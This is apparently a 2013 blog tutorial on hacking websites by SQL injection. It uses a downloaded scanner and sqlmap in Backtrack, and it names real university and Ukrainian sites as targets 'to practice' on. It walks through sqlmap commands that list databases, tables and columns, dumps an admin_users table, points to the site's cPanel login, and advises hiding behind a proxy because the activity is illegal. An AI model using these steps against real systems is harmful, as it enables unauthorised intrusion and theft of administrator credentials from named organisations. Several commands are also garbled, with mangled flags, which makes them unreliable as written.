How to Hack a website:

This post is to learn SOL-injection in Backtrack to hack websites. Just for educational purpose

Step 1:

First you need to Scan SQL vulnerable site that contains error in SQL.

For Scanning Download : sql_poizon_v1.1_-_sqli_exploit_scanner_tool.rar

Step 2:

After Downloaded sql_poizon start scanning for vulnerable site.

You can either select one particular website.

Country can also be selected through which you wanna find vulnerable sites.

Just follow these pics.

Step 3:

We have located various vulnerable site link that contains error.

I am using this vulnerable Link.

~~http://www.hitecuni.edu.pk~~/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′

My SQL Error server version ’20′ at line 1 shows its vulnerability.

Errors and Bugs are always fixed in every updates. So you have to find fresh link with SQL error by yourself.

- In case you haven’t found any vulnerable links then here it is to practice.
- http://www.route66.com.ua/index.php?id=59′
- http://teddyland.org.ua/eng/index.php?id=40%27
- http://vecherka.donetsk.ua/index.php?id=4647′&show=news’

Step 4:

Start Backtrack to inject SQL script.

If you aren’t familiar with Backtrack it’s not a problem at all. Just check out this link to download and install how to install backtrack on windows

Backtrack >> Exploitation tool >> Web Exploitation Tools >> Sql Map

Step 5

Syntax we will be using, For Scanning URL

./sqlmap.py -u [URL] e.g

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′

This Gives us Basic information about Database version e.g My Sql > 5.0.11

step 6:

Now Lets Extract Database, For this we use Syntax

./sqlmap.py -u [URL] –dbs e.g

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ –dbs

There are 2 Database we found. 1. information_schema and 2. Khybere_Khydb

We will be using any one of the Table, So in this we are using Khybere_Khydb

Step 7:

Now we use this Syntax For getting Tables.

As Database = Khybere_Khydb

./sqlmap.py -u [URL] –tables -D [database]

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ – tables -DKhybere_Khydb

So here it is, We found 13 Tables

Out of these 13 i am using admin_users to get admin username and password.

You can use any of it according to the information.

Step 8:

In this syntax we use it for getting columns

Table name = admin_users ; Database = Khybere_Khydb

./sqlmap.py -u [URL] –columns -T [Table name] -D [database]

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ –columns-T admin_users -D Khybere_Khydb

3 columns are found

Now lets Dump the DATA.

Step 9:

We can either Dump the whole Column or specific column

For dumping whole column we use syntax

./sqlmap.py -u [URL] –dump –columns -T [table name] -D [database name] e.g

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ –dump–columns -T admin_users -D Khybere_Khydb

For specific column dump./sqlmap.py -u [URL] –dump -C [column name] -T [table name] -D [database name]

Step 10:

Congrats you have successfully Hacked and learned How to Hack a website and got it’s Username & Password.

Next you Have to find Admin Login Page.

http://~~hitecuni~~.edu.pk:2082/

Enter Username & Password

Useful Tips on How to Hack a website:

Download different Software’s that Can Scan URL’s vulnerability.

If My-SQL error is not Found then that site can’t be hacked by this method.

Always Use Proxy server to Hack, obviously it is an illegal activity.

like us on facebook.

One Last thing, Grades Don’t defines Intelligence, Anyone can learn it

C0mUpt3r W!z@rdZ

Friday 5 April 2013